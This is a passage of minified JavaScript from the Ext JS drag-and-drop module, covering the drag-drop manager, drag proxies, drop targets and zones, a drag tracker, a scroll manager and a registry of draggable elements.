this._execOnAll("resetConstraints", [])
}, lock:function () {
this.locked = true
}, unlock:function () {
this.locked = false
}, isLocked:function () {
return this.locked
}, locationCache:{}, useCache:true, clickPixelThresh:3, clickTimeThresh:350, dragThreshMet:false, clickTimeout:null, startX:0, startY:0, regDragDrop:function (c, b) {
if (!this.initialized) {
this.init()
}
if (!this.ids[b]) {
this.ids[b] = {}
}
this.ids[b][c.id] = c
}, removeDDFromGroup:function (d, b) {
if (!this.ids[b]) {
this.ids[b] = {}
}
var c = this.ids[b];
if (c && c[d.id]) {
delete c[d.id]
}
}, _remove:function (c) {
for (var b in c.groups) {
if (b && this.ids[b] && this.ids[b][c.id]) {
delete this.ids[b][c.id]
}
}
delete this.handleIds[c.id]
}, regHandle:function (c, b) {
if (!this.handleIds[c]) {
this.handleIds[c] = {}
}
this.handleIds[c][b] = b
}, isDragDrop:function (b) {
return(this.getDDById(b)) ? true : false
}, getRelated:function (h, c) {
var g = [];
for (var e in h.groups) {
for (var d in this.ids[e]) {
var b = this.ids[e][d];
if (!this.isTypeOfDD(b)) {
continue
}
if (!c || b.isTarget) {
g[g.length] = b
}
}
}
return g
}, isLegalTarget:function (g, e) {
var c = this.getRelated(g, true);
for (var d = 0, b = c.length; d < b; ++d) {
if (c[d].id == e.id) {
return true
}
}
return false
}, isTypeOfDD:function (b) {
return(b && b.__ygDragDrop)
}, isHandle:function (c, b) {
return(this.handleIds[c] && this.handleIds[c][b])
}, getDDById:function (c) {
for (var b in this.ids) {
if (this.ids[b][c]) {
return this.ids[b][c]
}
}
return null
}, handleMouseDown:function (d, c) {
if (Ext.QuickTips) {
Ext.QuickTips.ddDisable()
}
if (this.dragCurrent) {
this.handleMouseUp(d)
}
this.currentTarget = d.getTarget();
this.dragCurrent = c;
var b = c.getEl();
this.startX = d.getPageX();
this.startY = d.getPageY();
this.deltaX = this.startX - b.offsetLeft;
this.deltaY = this.startY - b.offsetTop;
this.dragThreshMet = false;
this.clickTimeout = setTimeout(function () {
var e = Ext.dd.DDM;
e.startDrag(e.startX, e.startY)
}, this.clickTimeThresh)
}, startDrag:function (b, c) {
clearTimeout(this.clickTimeout);
if (this.dragCurrent) {
this.dragCurrent.b4StartDrag(b, c);
this.dragCurrent.startDrag(b, c)
}
this.dragThreshMet = true
}, handleMouseUp:function (b) {
if (Ext.QuickTips) {
Ext.QuickTips.ddEnable()
}
if (!this.dragCurrent) {
return
}
clearTimeout(this.clickTimeout);
if (this.dragThreshMet) {
this.fireEvents(b, true)
} else {
}
this.stopDrag(b);
this.stopEvent(b)
}, stopEvent:function (b) {
if (this.stopPropagation) {
b.stopPropagation()
}
if (this.preventDefault) {
b.preventDefault()
}
}, stopDrag:function (b) {
if (this.dragCurrent) {
if (this.dragThreshMet) {
this.dragCurrent.b4EndDrag(b);
this.dragCurrent.endDrag(b)
}
this.dragCurrent.onMouseUp(b)
}
this.dragCurrent = null;
this.dragOvers = {}
}, handleMouseMove:function (d) {
if (!this.dragCurrent) {
return true
}
if (Ext.isIE && (d.button !== 0 && d.button !== 1 && d.button !== 2)) {
this.stopEvent(d);
return this.handleMouseUp(d)
}
if (!this.dragThreshMet) {
var c = Math.abs(this.startX - d.getPageX());
var b = Math.abs(this.startY - d.getPageY());
if (c > this.clickPixelThresh || b > this.clickPixelThresh) {
this.startDrag(this.startX, this.startY)
}
}
if (this.dragThreshMet) {
this.dragCurrent.b4Drag(d);
this.dragCurrent.onDrag(d);
if (!this.dragCurrent.moveOnly) {
this.fireEvents(d, false)
}
}
this.stopEvent(d);
return true
}, fireEvents:function (n, o) {
var q = this.dragCurrent;
if (!q || q.isLocked()) {
return
}
var r = n.getPoint();
var b = [];
var g = [];
var l = [];
var j = [];
var d = [];
for (var h in this.dragOvers) {
var c = this.dragOvers[h];
if (!this.isTypeOfDD(c)) {
continue
}
if (!this.isOverTarget(r, c, this.mode)) {
g.push(c)
}
b[h] = true;
delete this.dragOvers[h]
}
for (var p in q.groups) {
if ("string" != typeof p) {
continue
}
for (h in this.ids[p]) {
var k = this.ids[p][h];
if (!this.isTypeOfDD(k)) {
continue
}
if (k.isTarget && !k.isLocked() && ((k != q) || (q.ignoreSelf === false))) {
if (this.isOverTarget(r, k, this.mode)) {
if (o) {
j.push(k)
} else {
if (!b[k.id]) {
d.push(k)
} else {
l.push(k)
}
this.dragOvers[k.id] = k
}
}
}
}
}
if (this.mode) {
if (g.length) {
q.b4DragOut(n, g);
q.onDragOut(n, g)
}
if (d.length) {
q.onDragEnter(n, d)
}
if (l.length) {
q.b4DragOver(n, l);
q.onDragOver(n, l)
}
if (j.length) {
q.b4DragDrop(n, j);
q.onDragDrop(n, j)
}
} else {
var m = 0;
for (h = 0, m = g.length; h < m; ++h) {
q.b4DragOut(n, g[h].id);
q.onDragOut(n, g[h].id)
}
for (h = 0, m = d.length; h < m; ++h) {
q.onDragEnter(n, d[h].id)
}
for (h = 0, m = l.length; h < m; ++h) {
q.b4DragOver(n, l[h].id);
q.onDragOver(n, l[h].id)
}
for (h = 0, m = j.length; h < m; ++h) {
q.b4DragDrop(n, j[h].id);
q.onDragDrop(n, j[h].id)
}
}
if (o && !j.length) {
q.onInvalidDrop(n)
}
}, getBestMatch:function (d) {
var g = null;
var c = d.length;
if (c == 1) {
g = d[0]
} else {
for (var e = 0; e < c; ++e) {
var b = d[e];
if (b.cursorIsOver) {
g = b;
break
} else {
if (!g || g.overlap.getArea() < b.overlap.getArea()) {
g = b
}
}
}
}
return g
}, refreshCache:function (c) {
for (var b in c) {
if ("string" != typeof b) {
continue
}
for (var d in this.ids[b]) {
var e = this.ids[b][d];
if (this.isTypeOfDD(e)) {
var g = this.getLocation(e);
if (g) {
this.locationCache[e.id] = g
} else {
delete this.locationCache[e.id]
}
}
}
}
}, verifyEl:function (c) {
if (c) {
var b;
if (Ext.isIE) {
try {
b = c.offsetParent
} catch (d) {
}
} else {
b = c.offsetParent
}
if (b) {
return true
}
}
return false
}, getLocation:function (j) {
if (!this.isTypeOfDD(j)) {
return null
}
var h = j.getEl(), o, g, d, q, p, s, c, n, i, m;
try {
o = Ext.lib.Dom.getXY(h)
} catch (k) {
}
if (!o) {
return null
}
g = o[0];
d = g + h.offsetWidth;
q = o[1];
p = q + h.offsetHeight;
s = q - j.padding[0];
c = d + j.padding[1];
n = p + j.padding[2];
i = g - j.padding[3];
m = new Ext.lib.Region(s, c, n, i);
h = Ext.get(h.parentNode);
while (h && m) {
if (h.isScrollable()) {
m = m.intersect(h.getRegion())
}
h = h.parent()
}
return m
}, isOverTarget:function (k, b, d) {
var g = this.locationCache[b.id];
if (!g || !this.useCache) {
g = this.getLocation(b);
this.locationCache[b.id] = g
}
if (!g) {
return false
}
b.cursorIsOver = g.contains(k);
var j = this.dragCurrent;
if (!j || !j.getTargetCoord || (!d && !j.constrainX && !j.constrainY)) {
return b.cursorIsOver
}
b.overlap = null;
var h = j.getTargetCoord(k.x, k.y);
var c = j.getDragEl();
var e = new Ext.lib.Region(h.y, h.x + c.offsetWidth, h.y + c.offsetHeight, h.x);
var i = e.intersect(g);
if (i) {
b.overlap = i;
return(d) ? true : b.cursorIsOver
} else {
return false
}
}, _onUnload:function (c, b) {
a.removeListener(document, "mouseup", this.handleMouseUp, this);
a.removeListener(document, "mousemove", this.handleMouseMove, this);
a.removeListener(window, "resize", this._onResize, this);
Ext.dd.DragDropMgr.unregAll()
}, unregAll:function () {
if (this.dragCurrent) {
this.stopDrag();
this.dragCurrent = null
}
this._execOnAll("unreg", []);
for (var b in this.elementCache) {
delete this.elementCache[b]
}
this.elementCache = {};
this.ids = {}
}, elementCache:{}, getElWrapper:function (c) {
var b = this.elementCache[c];
if (!b || !b.el) {
b = this.elementCache[c] = new this.ElementWrapper(Ext.getDom(c))
}
return b
}, getElement:function (b) {
return Ext.getDom(b)
}, getCss:function (c) {
var b = Ext.getDom(c);
return(b) ? b.style : null
}, ElementWrapper:function (b) {
this.el = b || null;
this.id = this.el && b.id;
this.css = this.el && b.style
}, getPosX:function (b) {
return Ext.lib.Dom.getX(b)
}, getPosY:function (b) {
return Ext.lib.Dom.getY(b)
}, swapNode:function (d, b) {
if (d.swapNode) {
d.swapNode(b)
} else {
var e = b.parentNode;
var c = b.nextSibling;
if (c == d) {
e.insertBefore(d, b)
} else {
if (b == d.nextSibling) {
e.insertBefore(b, d)
} else {
d.parentNode.replaceChild(b, d);
e.insertBefore(d, c)
}
}
}
}, getScroll:function () {
var d, b, e = document.documentElement, c = document.body;
if (e && (e.scrollTop || e.scrollLeft)) {
d = e.scrollTop;
b = e.scrollLeft
} else {
if (c) {
d = c.scrollTop;
b = c.scrollLeft
} else {
}
}
return{top:d, left:b}
}, getStyle:function (c, b) {
return Ext.fly(c).getStyle(b)
}, getScrollTop:function () {
return this.getScroll().top
}, getScrollLeft:function () {
return this.getScroll().left
}, moveToEl:function (b, d) {
var c = Ext.lib.Dom.getXY(d);
Ext.lib.Dom.setXY(b, c)
}, numericSort:function (d, c) {
return(d - c)
}, _timeoutCount:0, _addListeners:function () {
var b = Ext.dd.DDM;
if (Ext.lib.Event && document) {
b._onLoad()
} else {
if (b._timeoutCount > 2000) {
} else {
setTimeout(b._addListeners, 10);
if (document && document.body) {
b._timeoutCount += 1
}
}
}
}, handleWasClicked:function (b, d) {
if (this.isHandle(d, b.id)) {
return true
} else {
var c = b.parentNode;
while (c) {
if (this.isHandle(d, c.id)) {
return true
} else {
c = c.parentNode
}
}
}
return false
}}
}();
Ext.dd.DDM = Ext.dd.DragDropMgr;
Ext.dd.DDM._addListeners()
}
Ext.dd.DD = function (c, a, b) {
if (c) {
this.init(c, a, b)
}
};
Ext.extend(Ext.dd.DD, Ext.dd.DragDrop, {scroll:true, autoOffset:function (c, b) {
var a = c - this.startPageX;
var d = b - this.startPageY;
this.setDelta(a, d)
}, setDelta:function (b, a) {
this.deltaX = b;
this.deltaY = a
}, setDragElPos:function (c, b) {
var a = this.getDragEl();
this.alignElWithMouse(a, c, b)
}, alignElWithMouse:function (c, h, g) {
var e = this.getTargetCoord(h, g);
var b = c.dom ? c : Ext.fly(c, "_dd");
if (!this.deltaSetXY) {
var i = [e.x, e.y];
b.setXY(i);
var d = b.getLeft(true);
var a = b.getTop(true);
this.deltaSetXY = [d - e.x, a - e.y]
} else {
b.setLeftTop(e.x + this.deltaSetXY[0], e.y + this.deltaSetXY[1])
}
this.cachePosition(e.x, e.y);
this.autoScroll(e.x, e.y, c.offsetHeight, c.offsetWidth);
return e
}, cachePosition:function (b, a) {
if (b) {
this.lastPageX = b;
this.lastPageY = a
} else {
var c = Ext.lib.Dom.getXY(this.getEl());
this.lastPageX = c[0];
this.lastPageY = c[1]
}
}, autoScroll:function (l, k, e, m) {
if (this.scroll) {
var n = Ext.lib.Dom.getViewHeight();
var b = Ext.lib.Dom.getViewWidth();
var p = this.DDM.getScrollTop();
var d = this.DDM.getScrollLeft();
var j = e + k;
var o = m + l;
var i = (n + p - k - this.deltaY);
var g = (b + d - l - this.deltaX);
var c = 40;
var a = (document.all) ? 80 : 30;
if (j > n && i < c) {
window.scrollTo(d, p + a)
}
if (k < p && p > 0 && k - p < c) {
window.scrollTo(d, p - a)
}
if (o > b && g < c) {
window.scrollTo(d + a, p)
}
if (l < d && d > 0 && l - d < c) {
window.scrollTo(d - a, p)
}
}
}, getTargetCoord:function (c, b) {
var a = c - this.deltaX;
var d = b - this.deltaY;
if (this.constrainX) {
if (a < this.minX) {
a = this.minX
}
if (a > this.maxX) {
a = this.maxX
}
}
if (this.constrainY) {
if (d < this.minY) {
d = this.minY
}
if (d > this.maxY) {
d = this.maxY
}
}
a = this.getTick(a, this.xTicks);
d = this.getTick(d, this.yTicks);
return{x:a, y:d}
}, applyConfig:function () {
Ext.dd.DD.superclass.applyConfig.call(this);
this.scroll = (this.config.scroll !== false)
}, b4MouseDown:function (a) {
this.autoOffset(a.getPageX(), a.getPageY())
}, b4Drag:function (a) {
this.setDragElPos(a.getPageX(), a.getPageY())
}, toString:function () {
return("DD " + this.id)
}});
Ext.dd.DDProxy = function (c, a, b) {
if (c) {
this.init(c, a, b);
this.initFrame()
}
};
Ext.dd.DDProxy.dragElId = "ygddfdiv";
Ext.extend(Ext.dd.DDProxy, Ext.dd.DD, {resizeFrame:true, centerFrame:false, createFrame:function () {
var b = this;
var a = document.body;
if (!a || !a.firstChild) {
setTimeout(function () {
b.createFrame()
}, 50);
return
}
var d = this.getDragEl();
if (!d) {
d = document.createElement("div");
d.id = this.dragElId;
var c = d.style;
c.position = "absolute";
c.visibility = "hidden";
c.cursor = "move";
c.border = "2px solid #aaa";
c.zIndex = 999;
a.insertBefore(d, a.firstChild)
}
}, initFrame:function () {
this.createFrame()
}, applyConfig:function () {
Ext.dd.DDProxy.superclass.applyConfig.call(this);
this.resizeFrame = (this.config.resizeFrame !== false);
this.centerFrame = (this.config.centerFrame);
this.setDragElId(this.config.dragElId || Ext.dd.DDProxy.dragElId)
}, showFrame:function (e, d) {
var c = this.getEl();
var a = this.getDragEl();
var b = a.style;
this._resizeProxy();
if (this.centerFrame) {
this.setDelta(Math.round(parseInt(b.width, 10) / 2), Math.round(parseInt(b.height, 10) / 2))
}
this.setDragElPos(e, d);
Ext.fly(a).show()
}, _resizeProxy:function () {
if (this.resizeFrame) {
var a = this.getEl();
Ext.fly(this.getDragEl()).setSize(a.offsetWidth, a.offsetHeight)
}
}, b4MouseDown:function (b) {
var a = b.getPageX();
var c = b.getPageY();
this.autoOffset(a, c);
this.setDragElPos(a, c)
}, b4StartDrag:function (a, b) {
this.showFrame(a, b)
}, b4EndDrag:function (a) {
Ext.fly(this.getDragEl()).hide()
}, endDrag:function (c) {
var b = this.getEl();
var a = this.getDragEl();
a.style.visibility = "";
this.beforeMove();
b.style.visibility = "hidden";
Ext.dd.DDM.moveToEl(b, a);
a.style.visibility = "hidden";
b.style.visibility = "";
this.afterDrag()
}, beforeMove:function () {
}, afterDrag:function () {
}, toString:function () {
return("DDProxy " + this.id)
}});
Ext.dd.DDTarget = function (c, a, b) {
if (c) {
this.initTarget(c, a, b)
}
};
Ext.extend(Ext.dd.DDTarget, Ext.dd.DragDrop, {getDragEl:Ext.emptyFn, isValidHandleChild:Ext.emptyFn, startDrag:Ext.emptyFn, endDrag:Ext.emptyFn, onDrag:Ext.emptyFn, onDragDrop:Ext.emptyFn, onDragEnter:Ext.emptyFn, onDragOut:Ext.emptyFn, onDragOver:Ext.emptyFn, onInvalidDrop:Ext.emptyFn, onMouseDown:Ext.emptyFn, onMouseUp:Ext.emptyFn, setXConstraint:Ext.emptyFn, setYConstraint:Ext.emptyFn, resetConstraints:Ext.emptyFn, clearConstraints:Ext.emptyFn, clearTicks:Ext.emptyFn, setInitPosition:Ext.emptyFn, setDragElId:Ext.emptyFn, setHandleElId:Ext.emptyFn, setOuterHandleElId:Ext.emptyFn, addInvalidHandleClass:Ext.emptyFn, addInvalidHandleId:Ext.emptyFn, addInvalidHandleType:Ext.emptyFn, removeInvalidHandleClass:Ext.emptyFn, removeInvalidHandleId:Ext.emptyFn, removeInvalidHandleType:Ext.emptyFn, toString:function () {
return("DDTarget " + this.id)
}});
Ext.dd.DragTracker = Ext.extend(Ext.util.Observable, {active:false, tolerance:5, autoStart:false, constructor:function (a) {
Ext.apply(this, a);
this.addEvents("mousedown", "mouseup", "mousemove", "dragstart", "dragend", "drag");
this.dragRegion = new Ext.lib.Region(0, 0, 0, 0);
if (this.el) {
this.initEl(this.el)
}
Ext.dd.DragTracker.superclass.constructor.call(this, a)
}, initEl:function (a) {
this.el = Ext.get(a);
a.on("mousedown", this.onMouseDown, this, this.delegate ? {delegate:this.delegate} : undefined)
}, destroy:function () {
this.el.un("mousedown", this.onMouseDown, this);
delete this.el
}, onMouseDown:function (b, a) {
if (this.fireEvent("mousedown", this, b) !== false && this.onBeforeStart(b) !== false) {
this.startXY = this.lastXY = b.getXY();
this.dragTarget = this.delegate ? a : this.el.dom;
if (this.preventDefault !== false) {
b.preventDefault()
}
Ext.getDoc().on({scope:this, mouseup:this.onMouseUp, mousemove:this.onMouseMove, selectstart:this.stopSelect});
if (this.autoStart) {
this.timer = this.triggerStart.defer(this.autoStart === true ? 1000 : this.autoStart, this, [b])
}
}
}, onMouseMove:function (d, c) {
if (this.active && Ext.isIE && !d.browserEvent.button) {
d.preventDefault();
this.onMouseUp(d);
return
}
d.preventDefault();
var b = d.getXY(), a = this.startXY;
this.lastXY = b;
if (!this.active) {
if (Math.abs(a[0] - b[0]) > this.tolerance || Math.abs(a[1] - b[1]) > this.tolerance) {
this.triggerStart(d)
} else {
return
}
}
this.fireEvent("mousemove", this, d);
this.onDrag(d);
this.fireEvent("drag", this, d)
}, onMouseUp:function (c) {
var b = Ext.getDoc(), a = this.active;
b.un("mousemove", this.onMouseMove, this);
b.un("mouseup", this.onMouseUp, this);
b.un("selectstart", this.stopSelect, this);
c.preventDefault();
this.clearStart();
this.active = false;
delete this.elRegion;
this.fireEvent("mouseup", this, c);
if (a) {
this.onEnd(c);
this.fireEvent("dragend", this, c)
}
}, triggerStart:function (a) {
this.clearStart();
this.active = true;
this.onStart(a);
this.fireEvent("dragstart", this, a)
}, clearStart:function () {
if (this.timer) {
clearTimeout(this.timer);
delete this.timer
}
}, stopSelect:function (a) {
a.stopEvent();
return false
}, onBeforeStart:function (a) {
}, onStart:function (a) {
}, onDrag:function (a) {
}, onEnd:function (a) {
}, getDragTarget:function () {
return this.dragTarget
}, getDragCt:function () {
return this.el
}, getXY:function (a) {
return a ? this.constrainModes[a].call(this, this.lastXY) : this.lastXY
}, getOffset:function (c) {
var b = this.getXY(c), a = this.startXY;
return[a[0] - b[0], a[1] - b[1]]
}, constrainModes:{point:function (b) {
if (!this.elRegion) {
this.elRegion = this.getDragCt().getRegion()
}
var a = this.dragRegion;
a.left = b[0];
a.top = b[1];
a.right = b[0];
a.bottom = b[1];
a.constrainTo(this.elRegion);
return[a.left, a.top]
}}});
Ext.dd.ScrollManager = function () {
var c = Ext.dd.DragDropMgr;
var e = {};
var b = null;
var i = {};
var h = function (l) {
b = null;
a()
};
var j = function () {
if (c.dragCurrent) {
c.refreshCache(c.dragCurrent.groups)
}
};
var d = function () {
if (c.dragCurrent) {
var l = Ext.dd.ScrollManager;
var m = i.el.ddScrollConfig ? i.el.ddScrollConfig.increment : l.increment;
if (!l.animate) {
if (i.el.scroll(i.dir, m)) {
j()
}
} else {
i.el.scroll(i.dir, m, true, l.animDuration, j)
}
}
};
var a = function () {
if (i.id) {
clearInterval(i.id)
}
i.id = 0;
i.el = null;
i.dir = ""
};
var g = function (m, l) {
a();
i.el = m;
i.dir = l;
var o = m.ddScrollConfig ? m.ddScrollConfig.ddGroup : undefined, n = (m.ddScrollConfig && m.ddScrollConfig.frequency) ? m.ddScrollConfig.frequency : Ext.dd.ScrollManager.frequency;
if (o === undefined || c.dragCurrent.ddGroup == o) {
i.id = setInterval(d, n)
}
};
var k = function (o, q) {
if (q || !c.dragCurrent) {
return
}
var s = Ext.dd.ScrollManager;
if (!b || b != c.dragCurrent) {
b = c.dragCurrent;
s.refreshCache()
}
var t = Ext.lib.Event.getXY(o);
var u = new Ext.lib.Point(t[0], t[1]);
for (var m in e) {
var n = e[m], l = n._region;
var p = n.ddScrollConfig ? n.ddScrollConfig : s;
if (l && l.contains(u) && n.isScrollable()) {
if (l.bottom - u.y <= p.vthresh) {
if (i.el != n) {
g(n, "down")
}
return
} else {
if (l.right - u.x <= p.hthresh) {
if (i.el != n) {
g(n, "left")
}
return
} else {
if (u.y - l.top <= p.vthresh) {
if (i.el != n) {
g(n, "up")
}
return
} else {
if (u.x - l.left <= p.hthresh) {
if (i.el != n) {
g(n, "right")
}
return
}
}
}
}
}
}
a()
};
c.fireEvents = c.fireEvents.createSequence(k, c);
c.stopDrag = c.stopDrag.createSequence(h, c);
return{register:function (n) {
if (Ext.isArray(n)) {
for (var m = 0, l = n.length; m < l; m++) {
this.register(n[m])
}
} else {
n = Ext.get(n);
e[n.id] = n
}
}, unregister:function (n) {
if (Ext.isArray(n)) {
for (var m = 0, l = n.length; m < l; m++) {
this.unregister(n[m])
}
} else {
n = Ext.get(n);
delete e[n.id]
}
}, vthresh:25, hthresh:25, increment:100, frequency:500, animate:true, animDuration:0.4, ddGroup:undefined, refreshCache:function () {
for (var l in e) {
if (typeof e[l] == "object") {
e[l]._region = e[l].getRegion()
}
}
}}
}();
Ext.dd.Registry = function () {
var d = {};
var b = {};
var a = 0;
var c = function (g, e) {
if (typeof g == "string") {
return g
}
var h = g.id;
if (!h && e !== false) {
h = "extdd-" + (++a);
g.id = h
}
return h
};
return{register:function (j, k) {
k = k || {};
if (typeof j == "string") {
j = document.getElementById(j)
}
k.ddel = j;
d[c(j)] = k;
if (k.isHandle !== false) {
b[k.ddel.id] = k
}
if (k.handles) {
var h = k.handles;
for (var g = 0, e = h.length; g < e; g++) {
b[c(h[g])] = k
}
}
}, unregister:function (j) {
var l = c(j, false);
var k = d[l];
if (k) {
delete d[l];
if (k.handles) {
var h = k.handles;
for (var g = 0, e = h.length; g < e; g++) {
delete b[c(h[g], false)]
}
}
}
}, getHandle:function (e) {
if (typeof e != "string") {
e = e.id
}
return b[e]
}, getHandleFromEvent:function (h) {
var g = Ext.lib.Event.getTarget(h);
return g ? b[g.id] : null
}, getTarget:function (e) {
if (typeof e != "string") {
e = e.id
}
return d[e]
}, getTargetFromEvent:function (h) {
var g = Ext.lib.Event.getTarget(h);
return g ? d[g.id] || b[g.id] : null
}}
}();
Ext.dd.StatusProxy = function (a) {
Ext.apply(this, a);
this.id = this.id || Ext.id();
this.el = new Ext.Layer({dh:{id:this.id, tag:"div", cls:"x-dd-drag-proxy " + this.dropNotAllowed, children:[
{tag:"div", cls:"x-dd-drop-icon"},
{tag:"div", cls:"x-dd-drag-ghost"}
]}, shadow:!a || a.shadow !== false});
this.ghost = Ext.get(this.el.dom.childNodes[1]);
this.dropStatus = this.dropNotAllowed
};
Ext.dd.StatusProxy.prototype = {dropAllowed:"x-dd-drop-ok", dropNotAllowed:"x-dd-drop-nodrop", setStatus:function (a) {
a = a || this.dropNotAllowed;
if (this.dropStatus != a) {
this.el.replaceClass(this.dropStatus, a);
this.dropStatus = a
}
}, reset:function (a) {
this.el.dom.className = "x-dd-drag-proxy " + this.dropNotAllowed;
this.dropStatus = this.dropNotAllowed;
if (a) {
this.ghost.update("")
}
}, update:function (a) {
if (typeof a == "string") {
this.ghost.update(a)
} else {
this.ghost.update("");
a.style.margin = "0";
this.ghost.dom.appendChild(a)
}
var b = this.ghost.dom.firstChild;
if (b) {
Ext.fly(b).setStyle("float", "none")
}
}, getEl:function () {
return this.el
}, getGhost:function () {
return this.ghost
}, hide:function (a) {
this.el.hide();
if (a) {
this.reset(true)
}
}, stop:function () {
if (this.anim && this.anim.isAnimated && this.anim.isAnimated()) {
this.anim.stop()
}
}, show:function () {
this.el.show()
}, sync:function () {
this.el.sync()
}, repair:function (b, c, a) {
this.callback = c;
this.scope = a;
if (b && this.animRepair !== false) {
this.el.addClass("x-dd-drag-repair");
this.el.hideUnders(true);
this.anim = this.el.shift({duration:this.repairDuration || 0.5, easing:"easeOut", xy:b, stopFx:true, callback:this.afterRepair, scope:this})
} else {
this.afterRepair()
}
}, afterRepair:function () {
this.hide(true);
if (typeof this.callback == "function") {
this.callback.call(this.scope || this)
}
this.callback = null;
this.scope = null
}, destroy:function () {
Ext.destroy(this.ghost, this.el)
}};
Ext.dd.DragSource = function (b, a) {
this.el = Ext.get(b);
if (!this.dragData) {
this.dragData = {}
}
Ext.apply(this, a);
if (!this.proxy) {
this.proxy = new Ext.dd.StatusProxy()
}
Ext.dd.DragSource.superclass.constructor.call(this, this.el.dom, this.ddGroup || this.group, {dragElId:this.proxy.id, resizeFrame:false, isTarget:false, scroll:this.scroll === true});
this.dragging = false
};
Ext.extend(Ext.dd.DragSource, Ext.dd.DDProxy, {dropAllowed:"x-dd-drop-ok", dropNotAllowed:"x-dd-drop-nodrop", getDragData:function (a) {
return this.dragData
}, onDragEnter:function (c, d) {
var b = Ext.dd.DragDropMgr.getDDById(d);
this.cachedTarget = b;
if (this.beforeDragEnter(b, c, d) !== false) {
if (b.isNotifyTarget) {
var a = b.notifyEnter(this, c, this.dragData);
this.proxy.setStatus(a)
} else {
this.proxy.setStatus(this.dropAllowed)
}
if (this.afterDragEnter) {
this.afterDragEnter(b, c, d)
}
}
}, beforeDragEnter:function (b, a, c) {
return true
}, alignElWithMouse:function () {
Ext.dd.DragSource.superclass.alignElWithMouse.apply(this, arguments);
this.proxy.sync()
}, onDragOver:function (c, d) {
var b = this.cachedTarget || Ext.dd.DragDropMgr.getDDById(d);
if (this.beforeDragOver(b, c, d) !== false) {
if (b.isNotifyTarget) {
var a = b.notifyOver(this, c, this.dragData);
this.proxy.setStatus(a)
}
if (this.afterDragOver) {
this.afterDragOver(b, c, d)
}
}
}, beforeDragOver:function (b, a, c) {
return true
}, onDragOut:function (b, c) {
var a = this.cachedTarget || Ext.dd.DragDropMgr.getDDById(c);
if (this.beforeDragOut(a, b, c) !== false) {
if (a.isNotifyTarget) {
a.notifyOut(this, b, this.dragData)
}
this.proxy.reset();
if (this.afterDragOut) {
this.afterDragOut(a, b, c)
}
}
this.cachedTarget = null
}, beforeDragOut:function (b, a, c) {
return true
}, onDragDrop:function (b, c) {
var a = this.cachedTarget || Ext.dd.DragDropMgr.getDDById(c);
if (this.beforeDragDrop(a, b, c) !== false) {
if (a.isNotifyTarget) {
if (a.notifyDrop(this, b, this.dragData)) {
this.onValidDrop(a, b, c)
} else {
this.onInvalidDrop(a, b, c)
}
} else {
this.onValidDrop(a, b, c)
}
if (this.afterDragDrop) {
this.afterDragDrop(a, b, c)
}
}
delete this.cachedTarget
}, beforeDragDrop:function (b, a, c) {
return true
}, onValidDrop:function (b, a, c) {
this.hideProxy();
if (this.afterValidDrop) {
this.afterValidDrop(b, a, c)
}
}, getRepairXY:function (b, a) {
return this.el.getXY()
}, onInvalidDrop:function (b, a, c) {
this.beforeInvalidDrop(b, a, c);
if (this.cachedTarget) {
if (this.cachedTarget.isNotifyTarget) {
this.cachedTarget.notifyOut(this, a, this.dragData)
}
this.cacheTarget = null
}
this.proxy.repair(this.getRepairXY(a, this.dragData), this.afterRepair, this);
if (this.afterInvalidDrop) {
this.afterInvalidDrop(a, c)
}
}, afterRepair:function () {
if (Ext.enableFx) {
this.el.highlight(this.hlColor || "c3daf9")
}
this.dragging = false
}, beforeInvalidDrop:function (b, a, c) {
return true
}, handleMouseDown:function (b) {
if (this.dragging) {
return
}
var a = this.getDragData(b);
if (a && this.onBeforeDrag(a, b) !== false) {
this.dragData = a;
this.proxy.stop();
Ext.dd.DragSource.superclass.handleMouseDown.apply(this, arguments)
}
}, onBeforeDrag:function (a, b) {
return true
}, onStartDrag:Ext.emptyFn, startDrag:function (a, b) {
this.proxy.reset();
this.dragging = true;
this.proxy.update("");
this.onInitDrag(a, b);
this.proxy.show()
}, onInitDrag:function (a, c) {
var b = this.el.dom.cloneNode(true);
b.id = Ext.id();
this.proxy.update(b);
this.onStartDrag(a, c);
return true
}, getProxy:function () {
return this.proxy
}, hideProxy:function () {
this.proxy.hide();
this.proxy.reset(true);
this.dragging = false
}, triggerCacheRefresh:function () {
Ext.dd.DDM.refreshCache(this.groups)
}, b4EndDrag:function (a) {
}, endDrag:function (a) {
this.onEndDrag(this.dragData, a)
}, onEndDrag:function (a, b) {
}, autoOffset:function (a, b) {
this.setDelta(-12, -20)
}, destroy:function () {
Ext.dd.DragSource.superclass.destroy.call(this);
Ext.destroy(this.proxy)
}});
Ext.dd.DropTarget = Ext.extend(Ext.dd.DDTarget, {constructor:function (b, a) {
this.el = Ext.get(b);
Ext.apply(this, a);
if (this.containerScroll) {
Ext.dd.ScrollManager.register(this.el)
}
Ext.dd.DropTarget.superclass.constructor.call(this, this.el.dom, this.ddGroup || this.group, {isTarget:true})
}, dropAllowed:"x-dd-drop-ok", dropNotAllowed:"x-dd-drop-nodrop", isTarget:true, isNotifyTarget:true, notifyEnter:function (a, c, b) {
if (this.overClass) {
this.el.addClass(this.overClass)
}
return this.dropAllowed
}, notifyOver:function (a, c, b) {
return this.dropAllowed
}, notifyOut:function (a, c, b) {
if (this.overClass) {
this.el.removeClass(this.overClass)
}
}, notifyDrop:function (a, c, b) {
return false
}, destroy:function () {
Ext.dd.DropTarget.superclass.destroy.call(this);
if (this.containerScroll) {
Ext.dd.ScrollManager.unregister(this.el)
}
}});
Ext.dd.DragZone = Ext.extend(Ext.dd.DragSource, {constructor:function (b, a) {
Ext.dd.DragZone.superclass.constructor.call(this, b, a);
if (this.containerScroll) {
Ext.dd.ScrollManager.register(this.el)
}
}, getDragData:function (a) {
return Ext.dd.Registry.getHandleFromEvent(a)
}, onInitDrag:function (a, b) {
this.proxy.update(this.dragData.ddel.cloneNode(true));
this.onStartDrag(a, b);
return true
}, afterRepair:function () {
if (Ext.enableFx) {
Ext.Element.fly(this.dragData.ddel).highlight(this.hlColor || "c3daf9")
}
this.dragging = false
}, getRepairXY:function (a) {
return Ext.Element.fly(this.dragData.ddel).getXY()
}, destroy:function () {
Ext.dd.DragZone.superclass.destroy.call(this);
if (this.containerScroll) {
Ext.dd.ScrollManager.unregister(this.el)
}
}});
Ext.dd.DropZone = function (b, a) {
Ext.dd.DropZone.superclass.constructor.call(this, b, a)
};
Ext.extend(Ext.dd.DropZone, Ext.dd.DropTarget, {getTargetFromEvent:function (a) {
return Ext.dd.Registry.getTargetFromEvent(a)
}, onNodeEnter:function (d, a, c, b) {
}, onNodeOver:function (d, a, c, b) {
return this.dropAllowed
}, onNodeOut:function (d, a, c, b) {
